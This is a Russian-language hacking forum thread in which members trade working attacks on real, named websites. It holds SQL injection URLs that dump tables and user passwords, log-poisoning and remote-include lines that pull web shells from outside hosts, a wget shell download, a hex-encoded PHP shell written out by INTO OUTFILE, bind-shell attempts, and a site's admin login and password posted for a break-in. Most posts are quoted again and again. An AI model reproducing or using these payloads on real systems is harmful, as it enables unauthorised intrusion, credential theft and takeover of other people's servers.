Seravin:

http://www.site.com/news.php?id=-1+union+select+0,1,group_concat(table_name),2+from +information_schema.tables+where+schema_name='xxx'

функция group_concat имеет ограничение на размер возвращаемых ей данных - 1024 символа, поэтому если таблиц слишком много в бд, то выведет не все
по базам -
select group_concat(table_name) from information_schema.tables where table_schema='имя_базы'

Group_concat(table_name) всегда возвращает все таблицы(если есть доступ к information_schema)? И как чтобы он по базам возвращал а не все таблицы разом?

Если очень нужно, чтоб прямо все разом, нужно воспользоваться циклической процедурой.
Подробнее (см. посты #4, #5): https://forum.antichat.net/thread118842.html

0nep@t0p:
для нево есть функция char()

инъекция типа селект, пользователь рут, бд mysql5, пути раскрыты. есть читалка, но не полноценная, некоторые файлы не открывает, например, индекс не читает (индекс есть, прочитал .htaccess, управляет mod_rewrite), но пососедству скрипты открывает. не могу писать в файл, даже в тмп. в чем соль?

---
еще когда делаешь запрос к information_schema.tables ответа нет от сервера. а при запросе mysql.user и schemata приходит.

не подскажите есть ли в инете скрипт или программа для проверки на уязвимость целого списка url`ов.
примерно так - загружаешь урлы из текстовика, а программа их сканирует и выдает уязвимые?

так обновление поста information_schema читается, только ответ идет долго-долго.

Простите за глупый вопрос но все таки я его снова подниму....

Операционная система Vista.
Поиска WI FI сетей и там находит безымянную сеть не зашифрованную....
Как к ней подключиться и узнать ее имя? Другой операционки нету и поставить нет возможности(

функция group_concat имеет ограничение на размер возвращаемых ей данных - 1024 символа, поэтому если таблиц слишком много в бд, то выведет не все
по базам -
select group_concat(table_name) from information_schema.tables where table_schema='имя_базы'
Или можно устроить конкатенацию полями
select group_concat(field) from (select concat_ws(0x3a,table_name) as field from information_schema.tables limit 0,20 ) as t

Простите за глупый вопрос но все таки я его снова подниму....

Операционная система Vista.
Поиска WI FI сетей и там находит безымянную сеть не зашифрованную....
Как к ней подключиться и узнать ее имя? Другой операционки нету и поставить нет возможности(


Сломал мозг, ты же сам ответил на свой вопрос!!1 Онотоле

Имеется иньекция, при подставлени кавычки выдает следующее:
select surname, name, patronymic from people where id = 851'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 4

Проверяю:
+and+1=1
+and+1=2

В первом случае выводит, во втором пусто, -> иньекция

Составляю запрос вида:

+union+select+1,2,3+--+

В ответ получаю:

select * from people where id = 851 union select 1,2,3 --

The used SELECT statements have a different number of columns

Почему во втором запросе исчезают значения, которые берет он сам, и что с этим можно сделать?

Почему именно union select 1,2,3 ?! Значит там другое кол-во полей в запросе,order by'ем проверяй.

Почему именно union select 1,2,3 ?! Значит там другое кол-во полей в запросе,order by'ем проверяй.

Так он же раскрывает полностью запрос при подставлении кавычки
select surname, name, patronymic from people where id = 851'


Впрочем проверяю:


+order+by+1
+order+by+1,2
+order+by+1,2,3

Выводит нормально

+order+by+1,2,3,4

select surname, name, patronymic from people where id = 851 order by 1,2,3,4

Unknown column '4' in 'order clause'

Так он же раскрывает полностью запрос при подставлении кавычки
select surname, name, patronymic from people where id = 851'


Впрочем проверяю:


+order+by+1
+order+by+1,2
+order+by+1,2,3

Выводит нормально

+order+by+1,2,3,4

select surname, name, patronymic from people where id = 851 order by 1,2,3,4

Unknown column '4' in 'order clause'
Блин ты вообще прочитал тему?
Переберай колонки епте.
union select 1,2,3,4 --

Ну значит может быть там данные подставляются в два запроса. Можно заюзать крутой способ Qwazar'а.
http://forum.antichat.ru/threadnav119047-2-10.html

Блин ты вообще прочитал тему?
Переберай колонки епте.
union select 1,2,3,4 --

Да делал я всё, делал. Перебирал до 20. Там вывод везде одинаковый, и только когда "union select 1,2,3" то вместо имён колонок ставит звёздочку.

Ну значит может быть там данные подставляются в два запроса. Можно заюзать крутой способ Qwazar'а.
http://forum.antichat.ru/threadnav119047-2-10.html

Спасибо, сейчас посмотрю

_iks_
кинь сюда ссылку или в ЛС, так быстрее будет!

немогу с одной уязвимостью разобратся..

http://****.ru/?лала=11940238')

Выводит ошыбку>

Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\')' at line 1

Делаю>

http://****.ru/?лала=119402381+order+by+1/*

Все идет


Когда делаю вот так>

http://****.ru/?лала=-119402381+order+by+2--

то выходит белый экран

а так>
http://****.ru/?лала=-119402381+order+by+3--

Query failed: Unknown column '3' in 'order clause'


Пробовал разные методы с UNION SELECT и нечего не найду, делаю такой запрос
http://****.ru/?лала=119402381+AND+1=1+union+select+1,2/*
и все время выходит Query failed: The used SELECT statements have a different number of columns

Подскажите пожалуйста что делать...

я знаю что там
DB Server:MySQL >=5

Выводи инфу в ошибку

pid=119402381+or(1,1)=(select+count(0),concat((sel ect+database()+from+information_schema.tables+limi t+0,1),floor(rand(0)*2))from(information_schema.ta bles)group+by+2)--+


Query failed: Duplicate entry 'bfstats1' for key 1

Выводи инфу в ошибку

pid=119402381+or(1,1)=(select+count(0),concat((sel ect+database()+from+information_schema.tables+limi t+0,1),floor(rand(0)*2))from(information_schema.ta bles)group+by+2)--+

огромное спасиба !! выручил сильно !!! респект тебе :)

Помогите,имеется сайт http:/ /www.ollis.ru/ ,там на каждой странице при кавычке ошибка такая:
SELECT * FROM _prop WHERE obj_type='block_page' and obj_id IN ('1'') - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'')' at line 1
SELECT * FROM _prop WHERE obj_type='html_page' and obj_id IN ('block_page1'') - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''block_page1'')' at line 1

Как не пробовал вытащить информацию(пробовал order by, union select),никак не получается!Помогите как вытаскивать?
Знаю что база 5.0.22

Помогите,имеется сайт http:/ /www.ollis.ru/ ,там на каждой странице при кавычке ошибка такая:
SELECT * FROM _prop WHERE obj_type='block_page' and obj_id IN ('1'') - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'')' at line 1
SELECT * FROM _prop WHERE obj_type='html_page' and obj_id IN ('block_page1'') - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''block_page1'')' at line 1

Как не пробовал вытащить информацию(пробовал order by, union select),никак не получается!Помогите как вытаскивать?
Знаю что база 5.0.22

http://www.ollis.ru/index.php?id=cabinet')+order+by+7%23&type=cabinet&action=lost_pw&mode=return_from_hidden


http://www.ollis.ru/index.php?id=cabinet')+and+(1,2)=(Select*From(Sele ct+Name_Const(version(),1),Name_Const(version(),1) )a)%23&type=cabinet&action=lost_pw&mode=return_from_hidden


Duplicate column name '5.0.22'

HAXTA4OK - Вот что значит мастер!Спасибо,я целый день мучаюсь)

у меня такая проблема...
есть lfi, на сайте стоит freebsd...
найшол по конфигу путь к логам:
/var/log/httpd-access.log
/var/log/httpd-error.log
как дальше правильно в них проинклудить шелл?

у меня такая проблема...
есть lfi, на сайте стоит freebsd...
найшол по конфигу путь к логам:
/var/log/httpd-access.log
/var/log/httpd-error.log
как дальше правильно в них проинклудить шелл?
http://site.ru/?<?php system('ls');exit; ?>&cmd=ls
Потом инклудь логи...

http://site.ru/?<?php system('ls');exit; ?>&cmd=ls
Потом инклудь логи...
ну там еще можно в юзер агент впихнуть типа
<?php include('http://supervasyahacker.com/supershell.txt'); ?>
но тут еще одна проблемка логи ведутся там с 2006 года и грузятся туеву хучу времени...

ну там еще можно в юзер агент впихнуть типа
<?php include('http://supervasyahacker.com/supershell.txt'); ?>
но тут еще одна проблемка логи ведутся там с 2006 года и грузятся туеву хучу времени...
Я привел пример. Ну вот и жди это туеву хучу времени, иначе - никак.

Я привел пример. Ну вот и жди это туеву хучу времени, иначе - никак.

вообщем присмотрелся я к логам и там вообще кроме 2006 года нету записей...
сложилось такое впечатление что сам файл присутствует, читать его можно но запись в него больше неведется:(
может ли такое быть?...

вообщем присмотрелся я к логам и там вообще кроме 2006 года нету записей...
сложилось такое впечатление что сам файл присутствует, читать его можно но запись в него больше неведется:(
может ли такое быть?...


1. Да, может.
2. Вызываемые ресурсы могут быть ограничены.
3. Может у тебя не LFI, не в тот лог пишешь, какая-то фильтрация.
4. Вообще как бы скрипт выполняется при загрузке сразу же! Т.е. если знать сразу пути и права, то выполнив system(cd /home/777; wget http://shellsite.com/shell.txt -O shell.php); то можно не ждать конца загрузки логов.

http://www.ollis.ru/index.php?id=cabinet')+order+by+7%23&type=cabinet&action=lost_pw&mode=return_from_hidden


http://www.ollis.ru/index.php?id=cabinet')+and+(1,2)=(Select*From(Sele ct+Name_Const(version(),1),Name_Const(version(),1) )a)%23&type=cabinet&action=lost_pw&mode=return_from_hidden
И напоследок,как вытащить логины да пароли?)Ради чего и задавал вопрос.Самому не получается.

Народ подскажите. Есть сайт, есть sql-injection при таком запросе
-11+UNION+SELECT+1,2,3,4,5,6/* выводит числа 3 и 6 когда подставляю строковые данные ну например version() или любое другое слово выбивает ошибку подскажите что можно сделать с таким сайтом

Народ подскажите. Есть сайт, есть sql-injection при таком запросе
-11+UNION+SELECT+1,2,3,4,5,6/* выводит числа 3 и 6 когда подставляю строковые данные ну например version() или любое другое слово выбивает ошибку подскажите что можно сделать с таким сайтом

омг, какой раз уже писалось =\
unhex(hex(version()))

_http://forum.antichat.ru/thread104591.html , см Вопрос №2

1. Да, может.
2. Вызываемые ресурсы могут быть ограничены.
3. Может у тебя не LFI, не в тот лог пишешь, какая-то фильтрация.
4. Вообще как бы скрипт выполняется при загрузке сразу же! Т.е. если знать сразу пути и права, то выполнив system(cd /home/777; wget http://shellsite.com/shell.txt -O shell.php); то можно не ждать конца загрузки логов.

там я смотрю в логах меня даже и нету,это при всем том што сам код я уже впихнул темболее в юзер-агент, он обязан там был засветится... хммм странно может и правда ограничения какието по выводу например содержимого лога? там только я видел за 2006 год и все...
вот вырезка с верхушки лога:

.145.194.221 - - [17/Oct/2006:20:33:55 +0300] "GET /subjects/63/svit-vit-kult/L_3.htm HTTP/1.1" 404 313 "http://www.google.com/search?q=%D1%80%D0%B5%D0%BD%D0%B5%D1%81%D0%B0%D0%B D%D1%81%D0%BD%D0%B8%D0%B9+%D0%BD%D0%B5%D0%BE%D0%BF %D0%BB%D0%B0%D1%82%D0%BE%D0%BD%D1%96%D0%B7%D0%BC&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&hl=ru" "Mozilla/5.0 (X11; U; Linux i686; en; rv:1.8.0.7) Gecko/20061010 Epiphany/2.16 Firefox/1.5.0.7" 74.6.72.174 - - [17/Oct/2006:20:34:13 +0300] "GET /labrary/Temat_rozpod_vir_lib/S01-04/library$/Fisiol_%F0%EE%F1/directory.djvu HTTP/1.0" 404 350 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us
а делаю я так:
через тампер дату в юзер агент пишу
<?php include('http://site.ru/shell.txt'); ?>
затем сразу обращаюсь к логу
http://www.site.ua/php1/index.php?page=../../../../../../var/log/httpd-access.log

Как из этих кусков логины и пароли вынести?

http://www.ollis.ru/index.php?id=cabinet')+order+by+7%23&type=cabinet&action=lost_pw&mode=return_from_hidden


http://www.ollis.ru/index.php?id=cabinet')+and+(1,2)=(Select*From(Sele ct+Name_Const(version(),1),Name_Const(version(),1) )a)%23&type=cabinet&action=lost_pw&mode=return_from_hidden

И напоследок,как вытащить логины да пароли?)Ради чего и задавал вопрос.Самому не получается.
Определять название БД, колонки. Выводить их оттуда. Об этом есть немало статтей.

пххп://bb.focus.de/focus/viewtopic.php?highlight=&t=102681/**/and/**/1=0+--
скул есть это уж точно и поле тоже тока 1, но может я что то не догнал, больше никак не могу раскрутит.
Можеть посоветуете с методами

скул есть это уж точно и поле тоже тока 1, но может я что то не догнал, больше никак не могу раскрутит.
Можеть посоветуете с методами
Это PostgreSQL
http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+version()||chr(58)||cu rrent_user||chr(58)||current_database())+as+int)--

Это PostgreSQL
http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+version()||chr(58)||cu rrent_user||chr(58)||current_database())+as+int)--
таблицы норм выводится через limit offset но на колонки ругается
пххп://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+column_name+from+infor mation_schema.columns+where+table_name=chr(39)||pg _user||chr(39)+limit+1+offset+0)+as+int)--

имя таблицы лучше писать в сhr(), а не просто кавычки чарить, по аналогии с MySql, а у тебя гибрид какой-то конгениальный)

имя таблицы лучше писать в сhr(), а не просто кавычки чарить, по аналогии с MySql, а у тебя гибрид какой-то конгениальный)
сначала проверил и имя таблицы в char но ничего не вышло тот же яйцо , но с боку

YuNi|[c,

http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((select+table_name||chr(47)||c olumn_name+from+information_schema.columns+where+c olumn_name+like+chr(37)||chr(109)||chr(97)||chr(10 5)||chr(108)||chr(37)+limit+1+offset+6)+as+int)


http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((select+username||chr(47)||use r_password+from+phpbb_users2+limit+1+offset+1)+as+ int)

YuNi|[c,

http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((select+table_name||chr(47)||c olumn_name+from+information_schema.columns+where+c olumn_name+like+chr(37)||chr(109)||chr(97)||chr(10 5)||chr(108)||chr(37)+limit+1+offset+6)+as+int)


http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((select+username||chr(47)||use r_password+from+phpbb_users2+limit+1+offset+1)+as+ int)
спс но всетаки я немного не понял запрос.

если например мне надо найти колонки с таблицы usage_privileges

http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+table_name+from+inform ation_schema.tables+limit+1+offset+3)+as+int)--
так какой будеть запрос?

Не пойму,при переборе колонок на 5 значение вылетает пустая страничка,как поступить ????

Сама sql http://www.ollis.ru/index.php?rest=1')+AND+1=2+UNION+SELECT+0,1,2,3,4, 5%23

спс но всетаки я немного не понял запрос.

если например мне надо найти колонки с таблицы usage_privileges

http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+table_name+from+inform ation_schema.tables+limit+1+offset+3)+as+int)--
так какой будеть запрос?
bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+column_name+from+infor mation_schema.columns+where+table_name=chr(117)||c hr(115)||chr(97)||chr(103)||chr(101)||chr(95)||chr (112)||chr(114)||chr(105)||chr(118)||chr(105)||chr (108)||chr(101)||chr(103)||chr(101)||chr(115)+limi t+1+offset+0)+as+int)--
Не пойму,при переборе колонок на 5 значение вылетает пустая страничка,как поступить ????

Сама sql http://www.ollis.ru/index.php?rest=1')+AND+1=2+UNION+SELECT+0,1,2,3,4, 5%23
http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+

http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+

А что это?))

А что это?))
Это вывод с твоей скули. Читай статьи

bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+column_name+from+infor mation_schema.columns+where+table_name=chr(117)||c hr(115)||chr(97)||chr(103)||chr(101)||chr(95)||chr (112)||chr(114)||chr(105)||chr(118)||chr(105)||chr (108)||chr(101)||chr(103)||chr(101)||chr(115)+limi t+1+offset+0)+as+int)--

http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+

бло ппц
сорри за тупой вопрос
таблицы норм выводится через limit offset но на колонки ругается пххп://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+column_name+from+infor mation_schema.columns+where+table_name=chr(39)||pg _user||chr(39)+limit+1+offset+0)+as+int)--

что не знал вообше про Postgresql ))

имя таблицы лучше писать в сhr(), а не просто кавычки чарить, по аналогии с MySql, а у тебя гибрид какой-то конгениальный)
))
спс всем за ответы

Нашол да одной социалке скулу, панголин сказал что это mysql 5 базы сказал,операционку,пользов ателя, но неможет подобрать таблицы, вернее их имена и колонки. Пробывал вручную но там blind sql injection. Как можно определить таблицы с базы и колнки таблиц? Кстате на ковычку ругается: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' order by auktionid DESC LIMIT 1' at line 1 Пробывал перекодировать но все равно ругается.

Нашол да одной социалке скулу, панголин сказал что это mysql 5 базы сказал,операционку,пользов ателя, но неможет подобрать таблицы, вернее их имена и колонки. Пробывал вручную но там blind sql injection. Как можно определить таблицы с базы и колнки таблиц? Кстате на ковычку ругается: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' order by auktionid DESC LIMIT 1' at line 1 Пробывал перекодировать но все равно ругается.
если там блинд юзай прогу toolza 1.0 от пашкела или marathon tools
эти как раз для блинд скули удобно


Кстати кто знает какой нит прогу encoder/decoder CHAR для mssql/postgresql/mysql
ручками долго кодировать

Нашол да одной социалке скулу, панголин сказал что это mysql 5 базы сказал,операционку,пользов ателя, но неможет подобрать таблицы, вернее их имена и колонки. Пробывал вручную но там blind sql injection. Как можно определить таблицы с базы и колнки таблиц? Кстате на ковычку ругается: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' order by auktionid DESC LIMIT 1' at line 1 Пробывал перекодировать но все равно ругается.
Через NAME_CONST можно сделать вывод. Способ описывал QWAZAR. Либо через блинд по символу определять. Скинь ссылку в личку.

Извинит вопрос не по теме.Но все же задам.Кто нибудь может рассказать как можно получить исходники с помощью svn уязвимости нашел на http://www.wi-fi.org/.svn/entries и еще на kp.ru/.svn/entries может это что дать?В форуме есть по этой уязвимости посты но там не нашел нужной информации.Заранее спасибо,кто поможет!

aldonin, http://habrahabr.ru/blogs/infosecurity/70330/


Но можно пойти и далее. В той же папке .svn находится директори text-base, в которой лежат последние версии всех файлов, находящихся в репозитории. Картину дополняет так же и то, что файлы имеют не стандартное расширение (например .php), которое позволяет их сразу отправить на интерпретатор, а дополнительное расширение .svn-base, благодаря которому файл отдается запросившему его человеку «как есть», т.е. голый исходный код!

draftcopy.ru/.svn/text-base/index.php.svn-base

Стоит заметить, что описанная картина является идеальной и хоть она и была таковой в большинстве случаев, все же большой процент исходных кодов не удалось получить по тем или иным причинам.


Так что так. Поковыряй, может найдешь чего интересного

http://www.wi-fi.org/.svn/text-base/info.php.svn-base
http://kp.ru/.svn/text-base/autohandler.svn-base

Это я уже смотрел.А как они видели файловую структуру,такого не отображается почему-то?Пробывал через клиент но просит естественно пароль.Может там хеш валяется как нить полезный?=)

Делаю зарос

http://www.ollis.ru/index.php?rest=1')%20union%20select%20*%20FROM%20( SELECT%20*%20FROM%20(SELECT%20NAME_CONST((SELECT%2 0concat_ws(0x3a,user_loginname,user_password)%20FR OM%20e107.e107_user%20LIMIT%201),%2014)d)%20as%20t %20%20JOIN%20(SELECT%20NAME_CONST((SELECT%20concat _ws(0x3a,user_loginname,user_password)%20FROM%20e1 07.e107_user%20LIMIT%201),%2014)e)%20b)a%23

выводит только логин , как найти пароль?

Делаю зарос

http://www.ollis.ru/index.php?rest=1')%20union%20select%20*%20FROM%20( SELECT%20*%20FROM%20(SELECT%20NAME_CONST((SELECT%2 0concat_ws(0x3a,user_loginname,user_password)%20FR OM%20e107.e107_user%20LIMIT%201),%2014)d)%20as%20t %20%20JOIN%20(SELECT%20NAME_CONST((SELECT%20concat _ws(0x3a,user_loginname,user_password)%20FROM%20e1 07.e107_user%20LIMIT%201),%2014)e)%20b)a%23

выводит только логин , как найти пароль?
Не выводит он логина, а пишет, что доступ к таблице e107_user текущему пользователю запрещен.

Не выводит он логина, а пишет, что доступ к таблице e107_user текущему пользователю запрещен.

И как это обойти?И возможно ли?

И как это обойти?И возможно ли?
Никак. Нет.

Никак. Нет.

Тоесть пользователей пароли никак.А говорил читай сатьи...все вытащишь.

Тоесть пользователей пароли никак.А говорил читай сатьи...все вытащишь.
Из таблицы e107_user - никак. Но скорее всего там есть еще таблицы. И прочитав статьи, а точнее поняв их, вытащишь все, что возможно вытащить!

Из таблицы e107_user - никак. Но скорее всего там есть еще таблицы. И прочитав статьи, а точнее поняв их, вытащишь все, что возможно вытащить!

А как узнать какие еще есть таблы?Это я из статьи взял e107

А вот тут вроде более интересная инфа о сайте http://kp.ru/.svn/text-base/autohandler.svn-base#raw ?

А как узнать какие еще есть таблы?Это я из статьи взял e107
Читай статьи, про вывод через NAME_CONST. QWAZAR описывал этот способ, я уже говорил.

Читай статьи, про вывод через NAME_CONST. QWAZAR описывал этот способ, я уже говорил.

Я его уже наизусть выучил https://forum.antichat.ru/showpost.php?p=1494443&postcount=11

Я его уже наизусть выучил https://forum.antichat.ru/showpost.php?p=1494443&postcount=11
Дело не в том, чтобы зазубрить. А в том, чтобы понимать...

Дело не в том, чтобы зазубрить. А в том, чтобы понимать...

Ну помоги вытащить,просто очень нужно.

MastaBass1
Будешь флудить в теме, отправишься в бан.
Тебе уже сказали, если надо, разбирайся, всё тебе уже показали, если лень дай денег кому-нибудь в разделе работа.
Просьбы о взломах тут запрещены
И в ПМ мне тоже спамить не нужно =\

Знаю пользователя базы данных mysql и пароль на одном сайте. Подскажите как зайти под этими данными в субд...

если база не на локалхосте и клиенты не фильтруються по айпи, то можно с помощью любого клиент-приложения mysql...

если база не на локалхосте и клиенты не фильтруються по айпи, то можно с помощью любого клиент-приложения mysql...
как узнать на локале мускул или нет? И еще где взять клиент приложение? В гугле не чего не нашел, может плохо искал...

искать phpmyadmin или попробовать этим, если удаленный доступ:

http://www.xakep.ru/post/49576/default.asp

PS: Мне очень понравилась dbForge Studio

Если ни то ни другое не поможет - пробовать эти же логин/пароль на админку, фтп, SSH, почту админа и etc.

как узнать на локале мускул или нет? И еще где взять клиент приложение? В гугле не чего не нашел, может плохо искал...
лей sql-shell от rst и подключайся к бд с данными котрые смог добыть. да и вобще это частный случай. хз че у тебя есть.

kodep,чтоб узнать висит ли мускуль, раньше был вариант с
telnet 3306
telnet 3307
telnet 3308
Попробуй, это не долго.

Возможно ли перевести SSI из режима NoExec в обычный(с екзеком) при помощи htaccess? Где вообще эта опция задается? в httpd.conf? На apache.org(http://httpd.apache.org/docs/2.0/mod/mod_include.html) я не нашел инфы нормальной.

Возможно ли перевести SSI из режима NoExec в обычный(с екзеком) при помощи htaccess? Где вообще эта опция задается? в httpd.conf? На apache.org(http://httpd.apache.org/docs/2.0/mod/mod_include.html) я не нашел инфы нормальной.

NoExec вводится с помощью добавления опции IncludesNOEXEC, но не Includes. Таким образом, чтобы включить Exec, надо переписать .htaccess:

AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
Options +Includes

NoExec вводится с помощью добавления опции IncludesNOEXEC, но не Includes. Таким образом, чтобы включить Exec, надо переписать .htaccess:

AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
Options +Includes



Естественно, htaccess создан был. Выполняются все директивы SSI, кроме exec, которая была заблокирована в httpd.conf. Щас погуглил еще немного, и допёр, что видимо в httpd.conf установлен noexec и переопределить его видимо нельзя.

вот собсно вопрос про PostgreSQL:

можно добавить новую таблицу аааа и колонку b типа id=27;CREATE TABLE аааа (b text);--
но
как добавить несколько колонок сразу на эту таблицу и можно ли добавит новую колонку на уже существуюшую таблицу.
Права на создание таблиц есть

вот собсно вопрос про PostgreSQL:

можно добавить новую таблицу аааа и колонку b типа
но
как добавить несколько колонок сразу на эту таблицу и можно ли добавит новую колонку на уже существуюшую таблицу.
Права на создание таблиц есть
http://www.postgresql.org/docs/8.1/static/sql-createtable.html
http://www.postgresql.org/docs/8.1/static/sql-altertable.html

profile.php?mode=editprofile&cmd=GET%20http://site.com/sh.txt%20>%20sh.php

получил смд
пытаюсь так залить. шел в пхпбб2
но файл не создаётся в чём трабла?

profile.php?mode=editprofile&cmd=GET%20http://site.com/sh.txt%20>%20sh.php

получил смд
пытаюсь так залить. шел в пхпбб2
но файл не создаётся в чём трабла?
какая ос?

profile.php?mode=editprofile&cmd=GET%20http://site.com/sh.txt%20>%20sh.php

получил смд
пытаюсь так залить. шел в пхпбб2
но файл не создаётся в чём трабла?

если allow_url_include On , то залей include($_GET[lol]); , и profile.php?mode=editprofile&lol=http://site.com/sh.txt , или пробуй через аватарки, _http://forum.antichat.ru/showpost.php?p=198446&postcount=3

вообщем есть скуля) пароли вытащил, но они мне оказались никчему(
теперь пробую залить шелл, делаю запрос :
-999+union+select+1,2,0x3c3f206563686f205c223c70726 53e5c223b4073797374656d28245f4745545b5c22636d645c2 25d293b6563686f205c223c2f7072653e5c223b3f3e,4,5,6+ INTO+OUTFILE+'/var/www/bans/z.php'--

В ответ получаю ошибку:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/var/www/bans/z.php-- ORDER BY date ASC' at line 1

пробовал убирать ковычки, дописывать ковычки, записывать путь в hex, ничего хорошего не вышло...
опытные кулхацкеры подскажите ламеру чё делать :)

вообщем есть скуля) пароли вытащил, но они мне оказались никчему(
теперь пробую залить шелл, делаю запрос :
-999+union+select+1,2,0x3c3f206563686f205c223c70726 53e5c223b4073797374656d28245f4745545b5c22636d645c2 25d293b6563686f205c223c2f7072653e5c223b3f3e,4,5,6+ INTO+OUTFILE+'/var/www/bans/z.php'--

В ответ получаю ошибку:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/var/www/bans/z.php-- ORDER BY date ASC' at line 1

пробовал убирать ковычки, дописывать ковычки, записывать путь в hex, ничего хорошего не вышло...
опытные кулхацкеры подскажите ламеру чё делать :)

Для того чтобы залился нужно:

1. magic_quotes_gpc = Off
2. file_priv Y
3. папка, доступная на запись

в поле, где выводятся цифры, напиши 's' , если вывелось s - magic_quotes_gpc = off.

делаешь запрос - ....from mysql.user where user= 'username' , username берёшь с того, что выводит user()

ну и нужно найти диру, в которую шелл загрузишь

_http://forum.antichat.ru/thread104591.html , см Вопрос №7

вообщем есть скуля) пароли вытащил, но они мне оказались никчему(
теперь пробую залить шелл, делаю запрос :
-999+union+select+1,2,0x3c3f206563686f205c223c70726 53e5c223b4073797374656d28245f4745545b5c22636d645c2 25d293b6563686f205c223c2f7072653e5c223b3f3e,4,5,6+ INTO+OUTFILE+'/var/www/bans/z.php'--

В ответ получаю ошибку:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/var/www/bans/z.php-- ORDER BY date ASC' at line 1

пробовал убирать ковычки, дописывать ковычки, записывать путь в hex, ничего хорошего не вышло...
опытные кулхацкеры подскажите ламеру чё делать :)
near '/var/www/bans/z.php--
путь не обрамлен ковычками, если ковычки слешируются try https://forum.antichat.ru/showpost.php?p=663815&postcount=39
других вариантов на сегодняшний день не имеется

Помогите парни залить шелл. Не могу понять куда можно... Если можно то поподробней
http://www.heel.com.ua
Админка внизу сайта

логин: admin
pass: shutnick

вот у меня вопрос по поводу открытия RDP на машине с Win. Там стоит мускул 5. Неоднократно открыл через скул рдп на mssql но есть ли возможность через мускул?

Не могу больше ничего получить, не хватает думалки:

http://www.3g-peoplenet.com.ua/news/news_view.php?news_id=-9+union+select+1,concat_ws(0x3a,version(),user()), 3,4,5,6,7,8,9,10,11,12+from+information_schema.tab les--

Что из этого можно вытянуть?
77-log:3g-administrator@localhost

а там ничего толкового не получишь...

http://www.3g-peoplenet.com.ua/news/news_view.php?news_id=-9+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,admi n_id,admin_name%29,9,10,11,12+from+admin--

колонки с пассами нет((

Помогите парни залить шелл. Не могу понять куда можно... Если можно то поподробней
http://www.heel.com.ua
Админка внизу сайта

логин: admin
pass: shutnick

/var/www/heelezTH/heel.com.ua/fckeditor/editor/filemanager/browser/default/connectors/php/commands.php

http://www.heel.com.ua/index.php?view=news&id=-487+UNION+SELECT+1,2,CONCAT%28Version%28%29,Databa se%28%29,User%28%29%29,4,5,6,7,8--%20+

все зделаю и ок..а в конце не полуцается..

а зацем ??

http://www.kane.dk/index.php?menuID=2&pageID=-2+union+select+0,1,group_concat(char(60,98,114,62) ,0x3a,g_id,0x3a,g_userName,0x3a,g_hashedPassword), 3+from+g2_User

Таблица в другой базе данных
http://www.kane.dk/index.php?menuID=2&pageID=-2+union+select+0,1,group_concat(char(60,98,114,62) ,0x3a,g_id,0x3a,g_userName,0x3a,g_hashedPassword), 3+from+usr_web0_2.g2_User

spasibo ElteRUS

делаю бинд порт на freebsd,проверяю
tcp 0 0 0.0.0.0:37695 0.0.0.0:* LISTEN
порт открылся,пробую приконектитсяnc
Cmd line: xx.xx.xx.xx 37695
(UNKNOWN) [xx.xx.xx.xx] 37695 (?) : Connection timed out
в чем может быть проблема ?

в фаерволе

всем привет!
у меня такой вопрос...
ктонибудь пробовал заливать шелл,или хотябы выполнять какието команды через:
../../../../../../proc/self/fd/2 -я знаю што это логи апача, но там внутри содержание больше напоминает пхп сессии.

Это не логи а список процессов вроде,там нужно юзер агент подменять.

Это не логи а список процессов вроде,там нужно юзер агент подменять.

а помойму это эррор_лог апачевский...

547
Ну так посмотри что туда пишется, пиши и инклудь. В чём проблема-то?
Если это error_log то возможно туда пишется Referer

/var/www/heelezTH/heel.com.ua/fckeditor/editor/filemanager/browser/default/connectors/php/commands.php

http://www.heel.com.ua/index.php?view=news&id=-487+UNION+SELECT+1,2,CONCAT%28Version%28%29,Databa se%28%29,User%28%29%29,4,5,6,7,8--%20+


